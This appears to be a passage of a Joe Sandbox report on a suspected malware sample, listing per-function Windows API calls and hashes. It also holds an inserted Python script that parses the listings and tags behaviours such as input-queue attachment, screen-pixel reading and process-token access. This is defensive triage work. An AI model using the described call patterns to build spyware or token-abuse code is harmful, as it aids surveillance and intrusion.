• Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
• Opcode ID: 8dbdbb8759a390a36b63ad5afcae3575b27ced0add9b908a005315f1d2fe4ec3
• Instruction ID: e7b4d0867e53092402090cf5118fbbb65b67745a93988a62e1992a613d164e7e
• Opcode Fuzzy Hash: 8dbdbb8759a390a36b63ad5afcae3575b27ced0add9b908a005315f1d2fe4ec3
• Instruction Fuzzy Hash: 24115E79900218FFDB10DFA5CC84EDEBBB4FB48310F2040A6EA04B7250D6716E11DBA4
APIs
  • Part of subcall function 00462612: GetWindowLongW.USER32(?,000000EB), ref: 00462623
• DefDlgProcW.USER32(?,00000020,?), ref: 004612D8
• GetClientRect.USER32(?,?), ref: 0049B84B
• GetCursorPos.USER32(?), ref: 0049B855
• ScreenToClient.USER32(?,?), ref: 0049B860
Memory Dump Source
• Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
• Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
Similarity
• API ID: Client$CursorLongProcRectScreenWindow
• String ID:
• API String ID: 4127811313-0
• Opcode ID: bc6abefca22ddbe506c5c6909f3323eb16641144c9f0ab06f4973b7099777b28
• Instruction ID: b2c386d1bc7236c9215b075011f1936a65785b24bfe708bfbeb0045d7a9f5546
• Opcode Fuzzy Hash: bc6abefca22ddbe506c5c6909f3323eb16641144c9f0ab06f4973b7099777b28
• Instruction Fuzzy Hash: 20116D75900099BFCB00DFA4D8959FE77B8FF05301F0404A6F901E7251D734BA568BAA
APIs
• QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,004C01FD,?,004C1250,?,00008000), ref: 004C166F
• Sleep.KERNEL32(00000000,?,?,?,?,?,?,004C01FD,?,004C1250,?,00008000), ref: 004C1694
• QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,004C01FD,?,004C1250,?,00008000), ref: 004C169E
• Sleep.KERNEL32(?,?,?,?,?,?,?,004C01FD,?,004C1250,?,00008000), ref: 004C16D1
Memory Dump Source
• Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
• Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
Similarity
• API ID: CounterPerformanceQuerySleep
• String ID:
• API String ID: 2875609808-0
                                                                                                                                                                            • Opcode ID: da83e0f0b924072c2834c4d5cf08578fc3d24a1fe2229b7e0db67a2d5ce8d588
                                                                                                                                                                            • Instruction ID: 0e96a1edad286a1e6078c5393aff790f95a915819db05aaacf6d4531a23fbc47
                                                                                                                                                                            • Opcode Fuzzy Hash: da83e0f0b924072c2834c4d5cf08578fc3d24a1fe2229b7e0db67a2d5ce8d588
                                                                                                                                                                            • Instruction Fuzzy Hash: C3118235D0051CD7CF00AFA5D984BEEFB78FF0A711F08406AD940B6251CB3495548B9A
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3016257755-0
                                                                                                                                                                            • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                                                                                                            • Instruction ID: e44cbc024a9f844d262fe1dd88744d824ba1349fcaa727bbf75c7f22d18af153
                                                                                                                                                                            • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                                                                                                            • Instruction Fuzzy Hash: 7101807206414ABBCF125F84CC01CEE3F22BF59344F088566FA1858131C23BC9B1AB89
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 004EB59E
                                                                                                                                                                            • ScreenToClient.USER32(?,?), ref: 004EB5B6
                                                                                                                                                                            • ScreenToClient.USER32(?,?), ref: 004EB5DA
                                                                                                                                                                            • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 004EB5F5
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ClientRectScreen$InvalidateWindow
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 357397906-0
                                                                                                                                                                            • Opcode ID: 7ee3cf1c57fdc88a1e2b173877df77b6e67ddf1064ea63552d60eef75f6b0241
                                                                                                                                                                            • Instruction ID: 8dbdefbcffe6f2cac6ba8e94c2ac544bbf998fc66e7a0f9891ba8feca26d7930
                                                                                                                                                                            • Opcode Fuzzy Hash: 7ee3cf1c57fdc88a1e2b173877df77b6e67ddf1064ea63552d60eef75f6b0241
                                                                                                                                                                            • Instruction Fuzzy Hash: 541166B5D00249EFDB01CFA9C484AEEFBB5FF08310F108166E914E3220D735AA558F94
                                                                                                                                                                            APIs
                                                                                                                                                                            • _memset.LIBCMT ref: 004EB8FE
                                                                                                                                                                            • _memset.LIBCMT ref: 004EB90D
                                                                                                                                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00527F20,00527F64), ref: 004EB93C
                                                                                                                                                                            • CloseHandle.KERNEL32 ref: 004EB94E
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _memset$CloseCreateHandleProcess
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3277943733-0
                                                                                                                                                                            • Opcode ID: a31793efec21ca4096d84a771b981f8ab930c3a42945fcef2cfc6b13126ace8b
                                                                                                                                                                            • Instruction ID: 29395e71ba5ade5976bd7d85e21ef2d5ad2d8d7ed17da574d6d561c3eafb10c1
                                                                                                                                                                            • Opcode Fuzzy Hash: a31793efec21ca4096d84a771b981f8ab930c3a42945fcef2cfc6b13126ace8b
                                                                                                                                                                            • Instruction Fuzzy Hash: F8F0BEB25483187BE220AB61AC45FBB3A8CEF0E748F000031BB08D92A6D775480497BC
                                                                                                                                                                            APIs
                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 004C6E88
                                                                                                                                                                              • Part of subcall function 004C794E: _memset.LIBCMT ref: 004C7983
                                                                                                                                                                            • _memmove.LIBCMT ref: 004C6EAB
                                                                                                                                                                            • _memset.LIBCMT ref: 004C6EB8
                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 004C6EC8
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CriticalSection_memset$EnterLeave_memmove
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 48991266-0
                                                                                                                                                                            • Opcode ID: a22e8e0127f811a6dabddb42ec0e0b45d7154b8d4c9e3686f569328e25fabbcd
                                                                                                                                                                            • Instruction ID: 1dd1e67bc3d6aaad0841117c446db0b469362cdd9f7b15d26dc18af50977b77c
                                                                                                                                                                            • Opcode Fuzzy Hash: a22e8e0127f811a6dabddb42ec0e0b45d7154b8d4c9e3686f569328e25fabbcd
                                                                                                                                                                            • Instruction Fuzzy Hash: 97F0547A100200ABCF416F55DC85F49BB29EF45324B14C06AFE085E22BC735A911DBB8
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 004612F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0046134D
                                                                                                                                                                              • Part of subcall function 004612F3: SelectObject.GDI32(?,00000000), ref: 0046135C
                                                                                                                                                                              • Part of subcall function 004612F3: BeginPath.GDI32(?), ref: 00461373
                                                                                                                                                                              • Part of subcall function 004612F3: SelectObject.GDI32(?,00000000), ref: 0046139C
                                                                                                                                                                            • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 004EC030
                                                                                                                                                                            • LineTo.GDI32(00000000,?,?), ref: 004EC03D
                                                                                                                                                                            • EndPath.GDI32(00000000), ref: 004EC04D
                                                                                                                                                                            • StrokePath.GDI32(00000000), ref: 004EC05B
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1539411459-0
                                                                                                                                                                            • Opcode ID: e82b03850e7cb8ff71cc04b156e5349d9c6277a1047131c0fd594444f9a24ee3
                                                                                                                                                                            • Instruction ID: f2d1e0fd2511e21b0d88baac9b8845f162b0fb41cb1e141d75d429c6bb89e2b0
                                                                                                                                                                            • Opcode Fuzzy Hash: e82b03850e7cb8ff71cc04b156e5349d9c6277a1047131c0fd594444f9a24ee3
                                                                                                                                                                            • Instruction Fuzzy Hash: E9F0E232001299FBDB226F91AC09FCE3F99AF06311F048051FB11250E28779066ADFDD
                                                                                                                                                                            APIs
                                                                                                                                                                            • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 004BA399
• GetWindowThreadProcessId.USER32(?,00000000), ref: 004BA3AC
• GetCurrentThreadId.KERNEL32 ref: 004BA3B3
• AttachThreadInput.USER32(00000000), ref: 004BA3BA
Memory Dump Source
• Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
• Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
Similarity
• API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
• String ID:
• API String ID: 2710830443-0
• Opcode ID: a9a4d83e2973960aa471d0643689ebc9a9ad5845e0461909a15b6852a519885b
• Instruction ID: 32056ef287100649c08ce8e98f7680c66c7407d5c3c234a47b21e3d6b8d17092
• Opcode Fuzzy Hash: a9a4d83e2973960aa471d0643689ebc9a9ad5845e0461909a15b6852a519885b
• Instruction Fuzzy Hash: 14E03931141368BBDB201BA2DC4CEDB7F5CEF167A1F008035F908880A1C6758956CBB9
APIs
• GetSysColor.USER32(00000008), ref: 00462231
• SetTextColor.GDI32(?,000000FF), ref: 0046223B
• SetBkMode.GDI32(?,00000001), ref: 00462250
• GetStockObject.GDI32(00000005), ref: 00462258
• GetWindowDC.USER32(?,00000000), ref: 0049C0D3
• GetPixel.GDI32(00000000,00000000,00000000), ref: 0049C0E0
• GetPixel.GDI32(00000000,?,00000000), ref: 0049C0F9
• GetPixel.GDI32(00000000,00000000,?), ref: 0049C112
• GetPixel.GDI32(00000000,?,?), ref: 0049C132
• ReleaseDC.USER32(?,00000000), ref: 0049C13D
Memory Dump Source
• Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
• Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
Similarity
• API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
• String ID:
• API String ID: 1946975507-0
• Opcode ID: 51917bb9c0a346b6a2cca9f39127d2dc7323d672096295c79205a5ec728df155
• Instruction ID: f79055b472d1e2968df152dce89d0e864cea5f69913d96e084b688b231f2efdf
• Opcode Fuzzy Hash: 51917bb9c0a346b6a2cca9f39127d2dc7323d672096295c79205a5ec728df155
• Instruction Fuzzy Hash: AFE03031100184EAEF215FA4EC897D97B14AB15332F008376FA69480E287754984DB15
APIs
• GetCurrentThread.KERNEL32 ref: 004B8C63
• OpenThreadToken.ADVAPI32(00000000,?,?,?,004B882E), ref: 004B8C6A
• GetCurrentProcess.KERNEL32(00000028,?,?,?,?,004B882E), ref: 004B8C77
• OpenProcessToken.ADVAPI32(00000000,?,?,?,004B882E), ref: 004B8C7E
Memory Dump Source
• Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
• Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
Similarity
• API ID: CurrentOpenProcessThreadToken
• String ID:
• API String ID: 3974789173-0
• Opcode ID: 3a6a348dc4db475639b1bfd928d4c6555d3bb322f75e297d6163dd00aaa07cc6
• Instruction ID: 4280dc30813be8d0b2872712d408855f3ed25ab814f127f95e7e0cdfb15fe8f6
• Opcode Fuzzy Hash: 3a6a348dc4db475639b1bfd928d4c6555d3bb322f75e297d6163dd00aaa07cc6
• Instruction Fuzzy Hash: AFE08676642251DBE7205FB06D4CBA73BBCEF50792F054838B645CD041DA348449CB75
APIs
• GetDesktopWindow.USER32 ref: 004A2187
• GetDC.USER32(00000000), ref: 004A2191
• GetDeviceCaps.GDI32(00000000,0000000C), ref: 004A21B1
• ReleaseDC.USER32(?), ref: 004A21D2
Memory Dump Source
• Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
• Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
Similarity
• API ID: CapsDesktopDeviceReleaseWindow
• String ID:
• API String ID: 2889604237-0
• Opcode ID: aa18542899b351681b95e1ebb044b2666350107dd4765c553f53a0f09f807b77
• Instruction ID: bad452c787539267f64522a4f01a01869c68b03810dca3a678be6bc4dc8a44ae
• Opcode Fuzzy Hash: aa18542899b351681b95e1ebb044b2666350107dd4765c553f53a0f09f807b77
• Instruction Fuzzy Hash: F9E01A75800244EFDB019FB0C888AAD7BF5FB5C351F10C42AF95A9B221DB7885469F4A
APIs
• GetDesktopWindow.USER32 ref: 004A219B
• GetDC.USER32(00000000), ref: 004A21A5
• GetDeviceCaps.GDI32(00000000,0000000C), ref: 004A21B1
• ReleaseDC.USER32(?), ref: 004A21D2
Memory Dump Source
• Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
• Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
Similarity
• API ID: CapsDesktopDeviceReleaseWindow
• String ID:
• API String ID: 2889604237-0
• Opcode ID: e5dc35ff7b62c298e803410aa21eb7678f4e710ccdbb6d065319429d7b852137
• Instruction ID: baf08c1a4641d59b18b78da9b5ba2a7be7848c38f527c82c8423b25dd72985ec
• Opcode Fuzzy Hash: e5dc35ff7b62c298e803410aa21eb7678f4e710ccdbb6d065319429d7b852137
• Instruction Fuzzy Hash: C9E01A75800244EFDB019FB0C88869D7BF5FB4C311F10C029F95A9B221DB7895469F49
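The per-function API lists above (the GetWindowThreadProcessId/AttachThreadInput sequence at 004BA3AC, the GetWindowDC/GetPixel sampling at 0049C0D3, the OpenThreadToken/OpenProcessToken pair at 004B8C63 and the GetDeviceCaps query at 004A2187) are quicker to triage when parsed than when read hash by hash. The Python below is an added example written for this page; it is not Joe Sandbox code and not code recovered from PI916810.exe. It parses lines in the report's "APIs" format, groups them per function, names the immediates whose meaning is fixed by the Win32 API (0000000C to GetDeviceCaps is BITSPIXEL, 00000008 to GetSysColor is COLOR_WINDOWTEXT, 00000005 to GetStockObject is NULL_BRUSH, 00000001 to SetBkMode is TRANSPARENT) and tags call combinations. The sample input is copied from the listing above with one "APIs" header per function; the behaviour labels are the editor's, and reading the 00000028 on the stack at the GetCurrentProcess call site as the access mask (TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES) for the OpenProcessToken that follows is an inference, not something the report states.

```python
"""Parse Joe Sandbox per-function 'APIs' listings and tag behaviours.
Added example by the editor, not Joe Sandbox code and not code from the sample;
the input lines are copied from this report, the behaviour labels are the editor's."""
import re

# One call-site line, e.g. "• AttachThreadInput.USER32(00000000), ref: 004BA3BA";
# no-argument APIs print without parentheses: "• GetCurrentThreadId.KERNEL32 ref: 004BA3B3".
API_LINE = re.compile(r"^\s*•\s*(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?"
                      r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$")

# Fixed Win32 constants for immediates in the listing: (API, arg index) -> {value: name}.
CONSTS = {("GetDeviceCaps", 1): {0x0C: "BITSPIXEL"},
          ("GetSysColor", 0): {0x08: "COLOR_WINDOWTEXT"},
          ("GetStockObject", 0): {0x05: "NULL_BRUSH"},
          ("SetBkMode", 1): {0x01: "TRANSPARENT"}}
TOKEN_ACCESS = {0x0002: "TOKEN_DUPLICATE", 0x0004: "TOKEN_IMPERSONATE",
                0x0008: "TOKEN_QUERY", 0x0020: "TOKEN_ADJUST_PRIVILEGES"}
# A tag fires when every named API appears in the same function's list (editor's labels).
PATTERNS = {
    "attaches to another thread's input queue":
        {"GetWindowThreadProcessId", "GetCurrentThreadId", "AttachThreadInput"},
    "reads screen pixels via window DC": {"GetWindowDC", "GetPixel", "ReleaseDC"},
    "opens own process/thread token": {"OpenThreadToken", "OpenProcessToken"},
    "queries display colour depth": {"GetDesktopWindow", "GetDC", "GetDeviceCaps"},
}


def parse_api_line(line):
    """Return {api, module, args, ref} or None for non-call lines.
    '?' (unresolved by the sandbox) -> None; 8-hex-digit immediates -> int."""
    m = API_LINE.match(line)
    if not m:
        return None
    args = []
    for a in (m.group("args") or "").split(","):
        a = a.strip()
        if a:
            args.append(int(a, 16) if re.fullmatch(r"[0-9A-Fa-f]{8}", a) else None)
    return {"api": m.group("api"), "module": m.group("mod"), "args": args,
            "ref": int(m.group("ref"), 16)}


def split_functions(lines):
    """Group call lines per function; an 'APIs' header starts a new one. Dump-source,
    hash and 'Part of subcall ...' lines do not match API_LINE and are skipped."""
    funcs, cur = [], []
    for line in lines:
        if line.strip() == "APIs":
            if cur:
                funcs.append(cur)
            cur = []
        else:
            call = parse_api_line(line)
            if call:
                cur.append(call)
    if cur:
        funcs.append(cur)
    return funcs


def decode_args(call):
    """Name the immediates whose meaning is fixed by the API (see CONSTS)."""
    return [table[call["args"][idx]] for (api, idx), table in CONSTS.items()
            if call["api"] == api and idx < len(call["args"]) and call["args"][idx] in table]


def decode_token_access(mask):
    """Split a TOKEN_* access mask into named rights, ascending bit order."""
    return [name for bit, name in sorted(TOKEN_ACCESS.items()) if mask & bit]


def analyse(text):
    """One summary dict per function: first call site, API names, named constants, tags."""
    report = []
    for func in split_functions(text.splitlines()):
        names = {c["api"] for c in func}
        report.append({"first_ref": f"{func[0]['ref']:08X}",
                       "apis": [c["api"] for c in func],
                       "consts": [n for c in func for n in decode_args(c)],
                       "behaviours": sorted(t for t, need in PATTERNS.items() if need <= names)})
    return report


# Sample input copied from the listing above (one 'APIs' header per function).
SAMPLE = """\
APIs
• GetWindowThreadProcessId.USER32(?,00000000), ref: 004BA3AC
• GetCurrentThreadId.KERNEL32 ref: 004BA3B3
• AttachThreadInput.USER32(00000000), ref: 004BA3BA
APIs
• GetSysColor.USER32(00000008), ref: 00462231
• SetBkMode.GDI32(?,00000001), ref: 00462250
• GetStockObject.GDI32(00000005), ref: 00462258
• GetWindowDC.USER32(?,00000000), ref: 0049C0D3
• GetPixel.GDI32(00000000,00000000,00000000), ref: 0049C0E0
• ReleaseDC.USER32(?,00000000), ref: 0049C13D
APIs
• GetCurrentThread.KERNEL32 ref: 004B8C63
• OpenThreadToken.ADVAPI32(00000000,?,?,?,004B882E), ref: 004B8C6A
• GetCurrentProcess.KERNEL32(00000028,?,?,?,?,004B882E), ref: 004B8C77
• OpenProcessToken.ADVAPI32(00000000,?,?,?,004B882E), ref: 004B8C7E
APIs
• GetDesktopWindow.USER32 ref: 004A2187
• GetDC.USER32(00000000), ref: 004A2191
• GetDeviceCaps.GDI32(00000000,0000000C), ref: 004A21B1
• ReleaseDC.USER32(?), ref: 004A21D2
"""

if __name__ == "__main__":
    for entry in analyse(SAMPLE):
        print(entry["first_ref"], entry["behaviours"], entry["consts"])
    # Editor's inference: 00000028 on the stack at GetCurrentProcess is the access
    # mask for the OpenProcessToken that follows it.
    print(decode_token_access(0x28))
```

The tags are triage leads, not verdicts: AttachThreadInput after GetWindowThreadProcessId is how a routine joins another window's input queue (needed to read that thread's key state or move its focus), but GUI-automation runtimes emit the same sequence, so the call site has to be read in context before it is treated as keylogging. The 'Part of subcall function ...' lines are deliberately not parsed as calls, since they belong to a different function than the one whose block they appear in.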
Strings
Memory Dump Source
• Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
• Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
Similarity
• API ID:
• String ID: %O
• API String ID: 0-3936426106
• Opcode ID: 4920403e1851ffe4195d89b9eec2e13507eff4726aff84da7295b4c5022d42b1
• Instruction ID: 37299a59bd0925fd803f4af6eb0ed9550d931c694a54a22bf35c4b0da97bdafb
• Opcode Fuzzy Hash: 4920403e1851ffe4195d89b9eec2e13507eff4726aff84da7295b4c5022d42b1
• Instruction Fuzzy Hash: 64B1A271900109ABCF14EF99C8819EEBBB4EF44314F51412BE902A7295FB399D86CB5F
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
• Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
